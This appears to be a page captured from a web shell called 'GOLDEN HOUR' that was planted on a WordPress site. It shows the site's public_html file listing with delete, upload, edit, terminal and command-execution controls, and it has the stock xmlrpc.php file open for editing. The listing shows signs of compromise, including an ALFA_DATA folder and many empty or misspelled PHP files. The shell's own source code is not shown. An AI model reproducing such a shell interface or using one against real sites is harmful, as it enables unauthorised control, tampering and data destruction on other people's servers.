GOLDEN HOUR
DIR: /home/vlabbdco/public_html
UP
UPLOAD
Name
Size
Action
.htaccess
280 B
DEL
.htaccess.bak-20260622
523 B
DEL
.htaccess.bk
461 B
DEL
.litespeed_flag
297 B
DEL
[ .tmb ]
-
DEL
[ .well-known ]
-
DEL
.well-known.tar
794.43 MB
DEL
[ .wp-cli ]
-
DEL
422
0 B
DEL
[ ALFA_DATA ]
-
DEL
Cap.php
0 B
DEL
[ LV ]
-
DEL
Savv.php
0 B
DEL
about.php
0 B
DEL
admin.php
0 B
DEL
api.php
0 B
DEL
aztec-kurulum.php
2.12 KB
DEL
[ cgi-bin ]
-
DEL
clear.php
0 B
DEL
content.php
0 B
DEL
[ deac10 ]
-
DEL
defaults.php
0 B
DEL
detail.php
0 B
DEL
domvf.php
1.22 MB
DEL
error_log
869.72 MB
DEL
filefuns.php
0 B
DEL
flap.php
6.93 KB
DEL
fpwch.php
0 B
DEL
goods.php
0 B
DEL
google1588975857979d77.html
53 B
DEL
google3aa33d73ab6fb797.html
53 B
DEL
google679d110b6a88e62d.html
53 B
DEL
google83cb97e9e9aad3d6.html
53 B
DEL
google9aff444a1cf021e8.html
53 B
DEL
googlefb1f327f5209f1ff.html
53 B
DEL
kilitle.php
0 B
DEL
networks.php
0 B
DEL
new-index.php
0 B
DEL
php.ini
695 B
DEL
product.php
0 B
DEL
products.php
0 B
DEL
qxmesyhqif.php
0 B
DEL
readme.html
7.11 KB
DEL
robots.txt
340 B
DEL
sample.php
648 B
DEL
shop.php
0 B
DEL
[ spbackupB ]
-
DEL
wax.php
0 B
DEL
[ wp ]
-
DEL
wp-activate.php
6.93 KB
DEL
wp-add.php
3.27 KB
DEL
[ wp-admin ]
-
DEL
wp-comments-post.php
2.27 KB
DEL
wp-config-sample.php
2.84 KB
DEL
wp-config.php
3.05 KB
DEL
[ wp-content ]
-
DEL
wp-coo.php
0 B
DEL
wp-cron.php
3.85 KB
DEL
wp-events.php
0 B
DEL
[ wp-includes ]
-
DEL
wp-links-opml.php
2.44 KB
DEL
wp-load.php
3.22 KB
DEL
wp-mail.php
8.26 KB
DEL
wp-phpinfo.php
19 B
DEL
wp-settings.php
20.48 KB
DEL
wp-signup.php
30.6 KB
DEL
wp-slgnup.gz
3.49 KB
DEL
wp-sx-generator.php
0 B
DEL
wp-trackback.php
4.7 KB
DEL
xmlrpc.php
3.16 KB
DEL
xmlrpcs.php
0 B
DEL
xmrlpc.php
0 B
DEL
Edit: xmlrpc.php
<?php /** * XML-RPC protocol support for WordPress * * @package WordPress */ /** * Whether this is an XML-RPC Request * * @var bool */ define( 'XMLRPC_REQUEST', true ); // Some browser-embedded clients send cookies. We don't want them. $_COOKIE = array(); // $HTTP_RAW_POST_DATA was deprecated in PHP 5.6 and removed in PHP 7.0. // phpcs:disable PHPCompatibility.Variables.RemovedPredefinedGlobalVariables.http_raw_post_dataDeprecatedRemoved if ( ! isset( $HTTP_RAW_POST_DATA ) ) { $HTTP_RAW_POST_DATA = file_get_contents( 'php://input' ); } // Fix for mozBlog and other cases where '<?xml' isn't on the very first line. if ( isset( $HTTP_RAW_POST_DATA ) ) { $HTTP_RAW_POST_DATA = trim( $HTTP_RAW_POST_DATA ); } // phpcs:enable /** Include the bootstrap for setting up WordPress environment */ require_once __DIR__ . '/wp-load.php'; if ( isset( $_GET['rsd'] ) ) { // http://cyber.law.harvard.edu/blogs/gems/tech/rsd.html header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true ); echo '<?xml version="1.0" encoding="' . get_option( 'blog_charset' ) . '"?' . '>'; ?> <rsd version="1.0" xmlns="http://archipelago.phrasewise.com/rsd"> <service> <engineName>WordPress</engineName> <engineLink>https://wordpress.org/</engineLink> <homePageLink><?php bloginfo_rss( 'url' ); ?></homePageLink> <apis> <api name="WordPress" blogID="1" preferred="true" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <api name="Movable Type" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <api name="MetaWeblog" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <api name="Blogger" blogID="1" preferred="false" apiLink="<?php echo site_url( 'xmlrpc.php', 'rpc' ); ?>" /> <?php /** * Add additional APIs to the Really Simple Discovery (RSD) endpoint. * * @link http://cyber.law.harvard.edu/blogs/gems/tech/rsd.html * * @since 3.5.0 */ do_action( 'xmlrpc_rsd_apis' ); ?> </apis> </service> </rsd> <?php exit; } require_once ABSPATH . 'wp-admin/includes/admin.php'; require_once ABSPATH . WPINC . '/class-IXR.php'; require_once ABSPATH . WPINC . '/class-wp-xmlrpc-server.php'; /** * Posts submitted via the XML-RPC interface get that title * * @name post_default_title * @var string */ $post_default_title = ''; /** * Filters the class used for handling XML-RPC requests. * * @since 3.1.0 * * @param string $class The name of the XML-RPC server class. */ $wp_xmlrpc_server_class = apply_filters( 'wp_xmlrpc_server_class', 'wp_xmlrpc_server' ); $wp_xmlrpc_server = new $wp_xmlrpc_server_class; // Fire off the request. $wp_xmlrpc_server->serve_request(); exit; /** * logIO() - Writes logging info to a file. * * @deprecated 3.4.0 Use error_log() * @see error_log() * * @param string $io Whether input or output * @param string $msg Information describing logging reason. */ function logIO( $io, $msg ) { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid _deprecated_function( __FUNCTION__, '3.4.0', 'error_log()' ); if ( ! empty( $GLOBALS['xmlrpc_logging'] ) ) { error_log( $io . ' - ' . $msg ); } }
SAVE FILE
TERMINAL
EXEC